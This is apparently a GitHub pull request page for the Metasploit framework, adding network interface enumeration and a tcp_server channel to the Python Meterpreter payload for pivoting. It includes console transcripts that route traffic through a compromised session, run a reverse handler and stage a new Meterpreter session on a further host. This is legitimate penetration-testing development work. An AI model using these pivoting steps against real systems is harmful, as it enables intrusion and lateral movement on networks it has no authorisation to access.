Python Meterpreter STDAPI Net Additions #3067

Merged
merged 10 commits into from Mar 13, 2014

Conversation

Projects
None yet
2 participants
Contributor

zeroSteiner commented Mar 5, 2014

This PR adds functionality to the python meterpreter for retrieving network interface information on Linux, Windows, and OSX. The bulk of this for Linux and Windows was ported from the corresponding native meterpreter implementations (Netlink and GetAdaptersAddresses). This also adds support for opening a tcp_server channel which increases the python meterpreters pivoting capabilities.

This has been tested on the following platforms:

  • Python 2.6 Linux 3.2.6
  • Python 2.7 Linux 3.13.4
  • Python 2.5 & 2.7 Windows XP SP3
  • Python 2.7 Windows 7 SP1 (Native 32-bit and Native 64-bit)
  • Python 2.7 OS X 10.7.5

To avoid adding another 100+ lines the output of ipconfig from each system is on pastebin

Verification stdapi_net_config_get_interfaces

The post/test/meterpreter module will check that IP addresses are returned from sessions in the interface information. Alternatively checking the output of 'ipconfig' on each of the major 3 platforms should yield the expected output:

meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:4b:5c:be
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : 192.168.90.168
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe4b:5cbe
IPv6 Netmask : ffff:ffff:ffff:ffff::

Verification net_tcp_server channel

To create a new tcp_server channel setup routes and then configure LHOST to and IP address available on the host being routed through. Running the handler should cause the message "Started reverse handler on ... via meterpreter session X" to be displayed. While the handler is running, netstat on the compromised host should indicate that the socket is open and listening.

msf4-git (S:2 J:0)  exploit(handler) > sessions -i -1
[*] Starting interaction with 9...

meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP LOOPBACK RUNNING
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 00:0c:29:4b:5c:be
MTU          : 1500
Flags        : UP BROADCAST RUNNING MULTICAST
IPv4 Address : 192.168.90.168
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::20c:29ff:fe4b:5cbe
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > background 
[*] Backgrounding session 9...
msf4-git (S:2 J:0)  exploit(handler) > route add 0.0.0.0 0.0.0.0 -1
[*] Route added
msf4-git (S:2 J:0)  exploit(handler) > set LHOST 192.168.90.168
LHOST => 192.168.90.168
msf4-git (S:2 J:0)  exploit(handler) > exploit

[*] Started reverse handler on 192.168.90.168:4444 via the meterpreter on session 9
[*] Starting the payload handler...
[*] Sending stage (17308 bytes)
[*] Meterpreter session 10 opened (Local Pipe -> Remote Pipe) at 2014-03-05 15:57:54 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux 3.13.4-200.fc20.x86_64 #1 SMP Thu Feb 20 23:00:47 UTC 2014
Architecture : x86_64
Meterpreter  : python/python
meterpreter > background 
[*] Backgrounding session 10...
msf4-git (S:3 J:0)  exploit(handler) > sessions

Active sessions
===============

  Id  Type                       Information                      Connection
  --  ----                       -----------                      ----------
  8   meterpreter python/python  tester @ WIN-82GTIDG995P         192.168.90.1:4444 -> 192.168.90.137:49190 (192.168.90.137)
  9   meterpreter python/python  root @ bt                        192.168.90.1:4444 -> 192.168.90.168:36758 (192.168.90.168)
  10  meterpreter python/python  steiner @ localhost.localdomain  Local Pipe -> Remote Pipe (172.20.220.118)

msf4-git (S:3 J:0)  exploit(handler) > 

Obligatory yo dawg I heard you like meterpreter sessions.

Verification Checklist:

  • run post/test/meterpreter on Windows
  • run post/test/meterpreter on Linux
  • run post/test/meterpreter on OSX
  • run reverse_tcp handler with a remote LHOST on Windows
  • run reverse_tcp handler with a remote LHOST on Linux
  • run reverse_tcp handler with a remote LHOST on OSX

@zeroSteiner zeroSteiner commented on the diff Mar 5, 2014

data/meterpreter/meterpreter.py
@@ -149,6 +180,25 @@ def tlv_pack(*args):
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
+#@export
@zeroSteiner

zeroSteiner Mar 5, 2014

Contributor

Python 2.5 does not allow decorators around class definitions.

Contributor

jlee-r7 commented Mar 13, 2014

Only failing test is net_config_get_routes, which isn't implemented. I'll fix the test and merge in a bit

@jlee-r7 jlee-r7 pushed a commit that referenced this pull request Mar 13, 2014

@egypt egypt Land #3067, python meterp net.config additions 6438b93

jlee-r7 merged commit 5ea2668 into rapid7:master Mar 13, 2014

1 check passed

default The Travis CI build passed
Details

zeroSteiner deleted the zeroSteiner:pymeterpreter-net branch May 9, 2014

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment